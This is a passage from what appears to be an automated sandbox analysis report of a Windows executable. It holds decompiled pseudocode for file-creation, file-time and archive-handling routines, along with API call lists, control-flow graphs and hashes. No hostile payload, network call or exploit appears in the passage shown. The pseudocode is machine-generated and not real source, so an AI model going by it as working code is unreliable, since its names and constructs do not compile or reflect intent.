                                          						_t24 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *_t14,  *(_t52 + 0x18), 0); // executed
                                          						__eflags = _t24 - 0xffffffff;
                                          						_t19 = _t24 != 0xffffffff;
                                          						__eflags = _t19;
                                          						 *_t50 = _t24;
                                          						_t23 = 0 | _t19;
                                          					}
                                          				} else {
                                          					E00401C80(_t52 - 0x18,  *(_t52 + 8));
                                          					 *((intOrPtr*)(_t52 - 4)) = 0;
                                          					_t26 = AreFileApisANSI();
                                          					asm("sbb eax, eax");
                                          					_push( ~_t26 + 1);
                                          					_t29 = E00403D04(_t52 - 0x24);
                                          					 *((char*)(_t52 - 4)) = 1;
                                          					_t8 = _t52 + 0x14; // 0x414be4
                                          					_t31 = E0040597A(_t50, _t57,  *_t29,  *(_t52 + 0xc),  *(_t52 + 0x10),  *_t8,  *(_t52 + 0x18));
                                          					E00403A9C( *((intOrPtr*)(_t52 - 0x24)));
                                          					E00403A9C( *((intOrPtr*)(_t52 - 0x18)));
                                          					_t23 = _t31;
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
                                          				return _t23;
                                          			}












                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004059B8
                                          • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                            • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                                          • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Create$ApisH_prolog
                                          • String ID: KA
                                          • API String ID: 1948390111-4133974868
                                          • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                                          • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                                          • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                                          • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 719 40483f-40484b 720 404859-404876 CreateFileW 719->720 721 40484d-404857 SetLastError 719->721 723 404894-404896 720->723 724 404878-40488e SetFileTime CloseHandle 720->724 722 404897-404899 721->722 723->722 724->723
                                          C-Code - Quality: 100%
                                          			E0040483F(WCHAR* __ecx, FILETIME* __edx, FILETIME* _a4, FILETIME* _a8) {
                                          				void* _t5;
                                          				int _t7;
                                          				signed int _t10;
                                          				FILETIME* _t13;
                                          				void* _t15;
                                          				void* _t17;
                                          
                                          				_t10 = 0;
                                          				_t17 =  *0x423148 - _t10; // 0x1
                                          				_t13 = __edx;
                                          				if(_t17 != 0) {
                                          					_t5 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
                                          					_t15 = _t5;
                                          					if(_t15 != 0xffffffff) {
                                          						_t7 = SetFileTime(_t15, _t13, _a4, _a8); // executed
                                          						_t10 = 0 | _t7 != 0x00000000;
                                          						CloseHandle(_t15);
                                          					}
                                          					return _t10;
                                          				}
                                          				SetLastError(0x78);
                                          				return 0;
                                          			}










                                          APIs
                                          • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                                          • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                                          • SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                                          • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastTime
                                          • String ID:
                                          • API String ID: 2291555494-0
                                          • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                                          • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                                          • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                                          • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 725 408524-40853c call 413954 728 408546-408579 call 40455d call 402170 725->728 729 40853e-408544 725->729 735 4085c5-4085dd call 4032a8 728->735 736 40857b-40857e 728->736 729->728 742 4085ef-4085f9 735->742 743 4085df-4085ed call 4039df 735->743 738 408582-408586 736->738 740 408590-408594 738->740 741 408588-40858a 738->741 746 408599-40859b 740->746 744 408596 741->744 745 40858c-40858e 741->745 748 4085fb-40860c call 4088ce 742->748 749 40863c-408640 742->749 758 40865e-408664 743->758 744->746 745->738 746->735 750 40859d-4085c4 call 401e19 call 401d7a call 403a9c 746->750 765 40862d-408631 call 4039df 748->765 766 40860e-40862b call 404407 748->766 751 408642-408646 749->751 752 40865c 749->752 750->735 756 408652-408657 call 4042eb 751->756 757 408648-40864d 751->757 752->758 756->752 761 408736-408755 call 4042ad call 403a9c * 2 757->761 763 408733-408735 758->763 764 40866a-40866f 758->764 793 408756-408764 761->793 763->761 769 408671-408678 call 4065b2 764->769 770 408683-4086ad call 40640d 764->770 774 408636-40863a 765->774 766->774 780 40867b-40867d 769->780 787 4086b5-4086b8 770->787 788 4086af-4086b3 770->788 774->748 774->749 780->770 783 408767-408769 780->783 783->761 791 4086d0-4086ea 787->791 792 4086ba-4086c7 787->792 790 408724-40872d 788->790 790->763 790->764 797 40876b-408774 791->797 798 4086ec-408701 791->798 855 4086c8 call 40df69 792->855 856 4086c8 call 40d1ab 792->856 794 4086cb-4086ce 796 408709-40870d 794->796 801 4087a1-4087a4 796->801 802 408713-40871c 796->802 799 408776-408778 797->799 800 40877c-40879f call 4042ad call 403a9c * 2 797->800 798->796 811 408703-408705 798->811 799->800 800->793 805 4087a6-4087af 801->805 806 4087bf-4087de 801->806 802->790 803 40871e-408720 802->803 803->790 809 4087b1-4087b3 805->809 810 4087b7-4087ba 805->810 815 4087e0-4087e8 806->815 816 4087f8-40881b call 405e34 call 40640d 806->816 809->810 810->761 811->796 817 4087ea 815->817 
818 4087ef-4087f3 call 401d1b 815->818 826 408879-408886 call 4088ce 816->826 827 40881d-408877 call 401c80 * 2 call 407d82 call 401d7a call 403a9c * 3 816->827 817->818 818->816 832 408888 826->832 833 40888a-4088b5 call 407d82 call 401d7a call 403a9c 826->833 847 4088b6-4088bf 827->847 832->833 833->847 849 4088c1-4088c3 847->849 850 4088c7-4088c9 847->850 849->850 850->761 855->794 856->794
                                          C-Code - Quality: 95%
                                          			E00408524(intOrPtr* __ecx) {
                                          				intOrPtr* _t153;
                                          				signed int _t157;
                                          				intOrPtr _t162;
                                          				signed int _t163;
                                          				signed int _t165;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				signed int _t172;
                                          				signed int _t178;
                                          				signed int _t179;
                                          				signed int _t185;
                                          				void* _t187;
                                          				signed int _t190;
                                          				void* _t196;
                                          				char* _t201;
                                          				signed int _t203;
                                          				signed int _t205;
                                          				intOrPtr _t210;
                                          				signed int _t220;
                                          				signed int _t222;
                                          				void* _t225;
                                          				signed int _t231;
                                          				intOrPtr _t257;
                                          				intOrPtr _t278;
                                          				signed int* _t289;
                                          				signed int _t292;
                                          				intOrPtr _t293;
                                          				intOrPtr _t295;
                                          				void* _t297;
                                          
                                          				E00413954(E00419AE4, _t297);
                                          				_t289 = __ecx;
                                          				_t292 = 0;
                                          				_t153 =  *((intOrPtr*)(__ecx));
                                          				if(_t153 != 0) {
                                          					 *((intOrPtr*)( *_t153 + 8))(_t153);
                                          					 *((intOrPtr*)(__ecx)) = 0;
                                          				}
                                          				 *(_t289 + 0x34) = _t292;
                                          				 *( *(_t289 + 0x30)) = _t292;
                                          				E0040455D(_t289 + 4);
                                          				 *(_t297 - 4) = _t292;
                                          				 *(_t297 - 0x20) = _t292;
                                          				 *(_t297 - 0x1c) = _t292;
                                          				 *(_t297 - 0x18) = _t292;
                                          				E00402170(_t297 - 0x20, 3);
                                          				_t157 =  *(_t297 - 0x28);
                                          				 *(_t297 - 4) = 1;
                                          				if(_t157 == _t292) {
                                          					L11:
                                          					E004032A8(_t297 - 0x68, 4);
                                          					 *((intOrPtr*)(_t297 - 0x68)) = 0x41b378;
                                          					__eflags =  *(_t297 + 0xc) - _t292;
                                          					 *(_t297 - 4) = 3;
                                          					if( *(_t297 + 0xc) < _t292) {
                                          						_t231 =  *(_t297 + 8);
                                          						 *(_t297 + 0xc) = _t292;
                                          						__eflags =  *(_t231 + 0x10);
                                          						if( *(_t231 + 0x10) <= 0) {
                                          							L18:
                                          							__eflags =  *(_t297 + 0x10);
                                          							if( *(_t297 + 0x10) != 0) {
                                          								L22:
                                          								_t292 = 0;
                                          								__eflags = 0;
                                          								L23:
                                          								__eflags =  *((intOrPtr*)(_t297 - 0x60)) - _t292;
                                          								 *(_t297 + 0xc) = _t292;
                                          								if( *((intOrPtr*)(_t297 - 0x60)) <= _t292) {
                                          									L37:
                                          									_t293 = 1;
                                          									L38:
                                          									 *(_t297 - 4) = 1;
                                          									E004042AD(_t297 - 0x68);
                                          									E00403A9C( *(_t297 - 0x20));
                                          									E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
                                          									_t162 = _t293;
                                          									L39:
                                          									 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
                                          									return _t162;
                                          								} else {
                                          									goto L24;
                                          								}
                                          								do {
                                          									L24:
                                          									_t163 =  *(_t297 + 0x10);
                                          									__eflags = _t163 - _t292;
                                          									if(_t163 == _t292) {
                                          										L26:
                                          										 *(_t297 + 8) = _t292;
                                          										 *(_t297 - 4) = 4;
                                          										_t165 =  *( *((intOrPtr*)(_t297 - 0x5c)) +  *(_t297 + 0xc) * 4);
                                          										 *(_t289 + 0x1c) = _t165;
                                          										E0040640D(_t297 + 8,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t165 * 4)) + 4))());
                                          										_t169 =  *(_t297 + 8);
                                          										__eflags = _t169 - _t292;
                                          										if(_t169 != _t292) {
                                          											__eflags =  *(_t297 + 0x10) - _t292;
                                          											if( *(_t297 + 0x10) == _t292) {
                                          												 *(_t297 - 0x14) = _t292;
                                          												 *(_t297 - 4) = 5;
                                          												 *((intOrPtr*)( *_t169))(_t169, 0x41b1f8, _t297 - 0x14);
                                          												_t171 =  *(_t297 - 0x14);
                                          												__eflags = _t171 - _t292;
                                          												if(_t171 == _t292) {
                                          													_t172 =  *(_t297 + 8);
                                          													 *(_t297 - 4) = 3;
                                          													__eflags = _t172 - _t292;
                                          													if(_t172 != _t292) {
                                          														 *((intOrPtr*)( *_t172 + 8))(_t172);
                                          													}
                                          													 *(_t297 - 4) = 1;
                                          													E004042AD(_t297 - 0x68);
                                          													E00403A9C( *(_t297 - 0x20));
                                          													E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
                                          													_t162 = 0x80004001;
                                          													goto L39;
                                          												}
                                          												 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t171 + 0xc))(_t171,  *((intOrPtr*)(_t297 + 0x14)));
                                          												_t178 =  *(_t297 - 0x14);
                                          												__eflags = _t178 - _t292;
                                          												 *(_t297 - 4) = 4;
                                          												if(_t178 != _t292) {
                                          													 *((intOrPtr*)( *_t178 + 8))(_t178);
                                          												}
                                          												L33:
                                          												__eflags =  *((intOrPtr*)(_t297 - 0x10)) - 1;
                                          												if( *((intOrPtr*)(_t297 - 0x10)) != 1) {
                                          													__eflags =  *((intOrPtr*)(_t297 - 0x10)) - _t292;
                                          													if( *((intOrPtr*)(_t297 - 0x10)) == _t292) {
                                          														 *(_t297 - 0x54) = _t292;
                                          														 *(_t297 - 0x52) = _t292;
                                          														_t179 =  *(_t297 + 8);
                                          														 *(_t297 - 4) = 6;
                                          														 *((intOrPtr*)( *_t179 + 0x20))(_t179, 0x37, _t297 - 0x54);
                                          														__eflags =  *(_t297 - 0x54) - _t292;
                                          														if( *(_t297 - 0x54) != _t292) {
                                          															__eflags =  *(_t297 - 0x54) - 8;
                                          															_t201 =  *(_t297 - 0x4c);
                                          															if( *(_t297 - 0x54) != 8) {
                                          																_t201 = L"Unknown error";
                                          															}
                                          															E00401D1B(_t289 + 0x30, _t201);
                                          														}
                                          														 *(_t297 - 4) = 4;
                                          														E00405E34(_t297 - 0x54);
                                          														E0040640D(_t289,  *(_t297 + 8));
                                          														_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) +  *(_t289 + 0x1c) * 4));
                                          														__eflags =  *(_t295 + 0x20);
                                          														if( *(_t295 + 0x20) != 0) {
                                          															_t185 = E004088CE(_t295, _t297 - 0x20);
                                          															__eflags = _t185;
                                          															if(_t185 < 0) {
                                          																_t185 = 0;
                                          																__eflags = 0;
                                          															}
                                          															_t257 =  *((intOrPtr*)(_t295 + 0x24));
                                          															_t143 =  *((intOrPtr*)(_t257 + _t185 * 4)) + 0xc; // 0xc
                                          															_push( *((intOrPtr*)(_t257 + _t185 * 4)));
                                          															_t187 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
                                          															 *(_t297 - 4) = 0xa;
                                          															E00401D7A(_t289 + 0x10, _t187);
                                          															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
                                          														} else {
                                          															E00401C80(_t297 - 0x44, 0x423338);
                                          															 *(_t297 - 4) = 7;
                                          															E00401C80(_t297 - 0x38, 0x423338);
                                          															_push(_t297 - 0x44);
                                          															_push(_t297 - 0x38);
                                          															 *(_t297 - 4) = 8;
                                          															_t196 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
                                          															 *(_t297 - 4) = 9;
                                          															E00401D7A(_t289 + 0x10, _t196);
                                          															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
                                          															E00403A9C( *((intOrPtr*)(_t297 - 0x38)));
                                          															E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
                                          														}
                                          														_t190 =  *(_t297 + 8);
                                          														 *(_t297 - 4) = 3;
                                          														__eflags = _t190;
                                          														if(_t190 != 0) {
                                          															 *((intOrPtr*)( *_t190 + 8))(_t190);
                                          														}
                                          														_t293 = 0;
                                          													} else {
                                          														_t203 =  *(_t297 + 8);
                                          														 *(_t297 - 4) = 3;
                                          														__eflags = _t203 - _t292;
                                          														if(_t203 != _t292) {
                                          															 *((intOrPtr*)( *_t203 + 8))(_t203);
                                          														}
                                          														_t293 =  *((intOrPtr*)(_t297 - 0x10));
                                          													}
                                          													goto L38;
                                          												}
                                          												_t205 =  *(_t297 + 8);
                                          												 *(_t297 - 4) = 3;
                                          												__eflags = _t205 - _t292;
                                          												if(_t205 != _t292) {
                                          													 *((intOrPtr*)( *_t205 + 8))(_t205);
                                          												}
                                          												goto L36;
                                          											}
                                          											 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t169 + 0xc))(_t169,  *(_t297 + 0x10), 0x41b5f8,  *((intOrPtr*)(_t297 + 0x18)));
                                          											goto L33;
                                          										}
                                          										 *(_t297 - 4) = 3;
                                          										goto L36;
                                          									}
                                          									_t210 =  *((intOrPtr*)( *_t163 + 0x10))(_t163, _t292, _t292, _t292, _t292);
                                          									__eflags = _t210 - _t292;
                                          									if(_t210 != _t292) {
                                          										_t293 = _t210;
                                          										goto L38;
                                          									}
                                          									goto L26;
                                          									L36:
                                          									 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
                                          									__eflags =  *(_t297 + 0xc) -  *((intOrPtr*)(_t297 - 0x60));
                                          								} while ( *(_t297 + 0xc) <  *((intOrPtr*)(_t297 - 0x60)));
                                          								goto L37;
                                          							}
                                          							__eflags =  *(_t297 + 0xc) - 1;
                                          							if( *(_t297 + 0xc) == 1) {
                                          								E004042EB(_t297 - 0x68, 1);
                                          								goto L22;
                                          							}
                                          							_t293 = 0x80004001;
                                          							goto L38;
                                          						} else {
                                          							goto L14;
                                          						}
                                          						do {
                                          							L14:
                                          							__eflags = E004088CE( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t292 * 4)), _t297 - 0x20);
                                          							if(__eflags < 0) {
                                          								E004039DF(_t297 - 0x68, _t292);
                                          							} else {
                                          								 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
                                          								E00404407(_t297 - 0x68, __eflags,  *(_t297 + 0xc));
                                          								 *(( *(_t297 + 0xc) << 2) +  *((intOrPtr*)(_t297 - 0x5c))) = _t292;
                                          								_t231 =  *(_t297 + 8);
                                          							}
                                          							_t292 = _t292 + 1;
                                          							__eflags = _t292 -  *(_t231 + 0x10);
                                          						} while (_t292 <  *(_t231 + 0x10));
                                          						goto L18;
                                          					}
                                          					E004039DF(_t297 - 0x68,  *(_t297 + 0xc));
                                          					_t231 =  *(_t297 + 8);
                                          					goto L23;
                                          				} else {
                                          					_t278 =  *((intOrPtr*)(_t297 - 0x2c));
                                          					_t220 = _t278 + _t157 * 2 - 2;
                                          					while( *_t220 != 0x2e) {
                                          						if(_t220 == _t278) {
                                          							_t222 = _t220 | 0xffffffff;
                                          							__eflags = _t222;
                                          							L9:
                                          							__eflags = _t222 - _t292;
                                          							if(_t222 >= _t292) {
                                          								__eflags = _t222 + 1;
                                          								_t225 = E00401E19(_t297 - 0x2c, _t297 - 0x44, _t222 + 1);
                                          								 *(_t297 - 4) = 2;
                                          								E00401D7A(_t297 - 0x20, _t225);
                                          								 *(_t297 - 4) = 1;
                                          								E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
                                          							}
                                          							goto L11;
                                          						} else {
                                          							_t220 = _t220;
                                          							continue;
                                          						}
                                          					}
                                          					_t222 = _t220 - _t278 >> 1;
                                          					goto L9;
                                          				}
                                          			}

































                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 83B$Unknown error
                                          • API String ID: 3519838083-1944086607
                                          • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                                          • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                                          • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                                          • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 79%
                                          			E00408F0A(intOrPtr __ecx) {
                                          				intOrPtr _t105;
                                          				intOrPtr _t113;
                                          				void* _t115;
                                          				intOrPtr _t118;
                                          				long _t123;
                                          				intOrPtr* _t131;
                                          				void* _t137;
                                          				void* _t141;
                                          				intOrPtr* _t151;
                                          				signed int _t157;
                                          				intOrPtr _t192;
                                          				intOrPtr* _t196;
                                          				long _t198;
                                          				void* _t199;
                                          
                                          				E00413954(E00419BC6, _t199);
                                          				_t192 = __ecx;
                                          				_t157 = 0;
                                          				_push(0x90);
                                          				 *((intOrPtr*)(__ecx + 0x28)) = 0;
                                          				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
                                          				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
                                          				_t105 = E00403A76();
                                          				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
                                          				 *(_t199 - 4) = 0;
                                          				if(_t105 == 0) {
                                          					_t196 = 0;
                                          					__eflags = 0;
                                          				} else {
                                          					_t196 = E00409184(_t105);
                                          				}
                                          				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                                          				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
                                          				if(_t196 != _t157) {
                                          					 *((intOrPtr*)( *_t196 + 4))(_t196);
                                          				}
                                          				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
                                          				 *(_t199 - 4) = 1;
                                          				 *(_t199 - 0x3c) = _t157;
                                          				 *(_t199 - 0x38) = _t157;
                                          				 *(_t199 - 0x34) = _t157;
                                          				E00402170(_t199 - 0x3c, 3);
                                          				 *(_t199 - 4) = 2;
                                          				 *(_t199 - 0x24) = _t157;
                                          				 *(_t199 - 0x20) = _t157;
                                          				 *(_t199 - 0x1c) = _t157;
                                          				E00402170(_t199 - 0x24, 3);
                                          				 *(_t199 - 4) = 3;
                                          				 *(_t199 - 0x30) = _t157;
                                          				 *(_t199 - 0x2c) = _t157;
                                          				 *(_t199 - 0x28) = _t157;
                                          				E00402170(_t199 - 0x30, 3);
                                          				 *(_t199 - 4) = 4;
                                          				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
                                          					_t58 = _t196 + 8; // 0x8
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
                                          					goto L13;
                                          				} else {
                                          					_push(_t199 + 0x1c);
                                          					if(E00404E76( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c) != 0) {
                                          						_t137 = E00401E3A(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
                                          						 *(_t199 - 4) = 5;
                                          						E00401D7A(_t199 - 0x24, _t137);
                                          						 *(_t199 - 4) = 4;
                                          						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                                          						_t141 = E00401E19(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
                                          						 *(_t199 - 4) = 6;
                                          						E00401D7A(_t199 - 0x30, _t141);
                                          						 *(_t199 - 4) = 4;
                                          						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                                          						_push(_t199 - 0x30);
                                          						_push(_t199 - 0x24);
                                          						E004092E9(_t196, __eflags); // executed
                                          						L13:
                                          						_push( *((intOrPtr*)(_t199 - 0x10)));
                                          						_push( *((intOrPtr*)(_t199 + 0x18)));
                                          						_t62 = _t199 + 0x14; // 0x414be4
                                          						_push( *_t62);
                                          						_push( *((intOrPtr*)(_t199 + 0x10)));
                                          						_push( *((intOrPtr*)(_t199 + 0xc)));
                                          						_push( *((intOrPtr*)(_t199 + 8)));
                                          						_t113 = E00408A3B(_t192); // executed
                                          						__eflags = _t113 - _t157;
                                          						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
                                          						if(_t113 == _t157) {
                                          							_push(_t199 - 0x30);
                                          							_t115 = E00402634(_t199 - 0x48, _t199 - 0x24);
                                          							_t193 = _t192 + 0x14;
                                          							_push(_t115);
                                          							 *(_t199 - 4) = 7;
                                          							E00403998(_t192 + 0x14);
                                          							 *(_t199 - 4) = 4;
                                          							E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                                          							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
                                          							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
                                          								do {
                                          									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
                                          									_push(E00402634(_t199 - 0x48, _t199 - 0x24));
                                          									 *(_t199 - 4) = 8;
                                          									E00403998(_t193);
                                          									 *(_t199 - 4) = 4;
                                          									E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                                          									_t157 = _t157 + 1;
                                          									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
                                          								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
                                          							}
                                          							_t118 =  *((intOrPtr*)(_t199 - 0x14));
                                          							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
                                          							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
                                          							E00403A9C( *(_t199 - 0x30));
                                          							E00403A9C( *(_t199 - 0x24));
                                          							E00403A9C( *(_t199 - 0x3c));
                                          							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                                          							E00403800(_t199 - 0x10);
                                          							_t123 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							E00403A9C( *(_t199 - 0x30));
                                          							E00403A9C( *(_t199 - 0x24));
                                          							E00403A9C( *(_t199 - 0x3c));
                                          							_t131 =  *((intOrPtr*)(_t199 - 0x10));
                                          							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                                          							__eflags = _t131 - _t157;
                                          							if(_t131 != _t157) {
                                          								 *((intOrPtr*)( *_t131 + 8))(_t131);
                                          							}
                                          							_t123 =  *((intOrPtr*)(_t199 + 0x18));
                                          						}
                                          					} else {
                                          						_t198 = GetLastError();
                                          						E00403A9C( *(_t199 - 0x30));
                                          						E00403A9C( *(_t199 - 0x24));
                                          						E00403A9C( *(_t199 - 0x3c));
                                          						_t151 =  *((intOrPtr*)(_t199 - 0x10));
                                          						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                                          						if(_t151 != _t157) {
                                          							 *((intOrPtr*)( *_t151 + 8))(_t151);
                                          						}
                                          						_t123 = _t198;
                                          					}
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
                                          				return _t123;
                                          			}


















                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00408F0F
                                          • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                            • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                            • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                            • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$ErrorLast
                                          • String ID: KA
                                          • API String ID: 2901101390-4133974868
                                          • Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
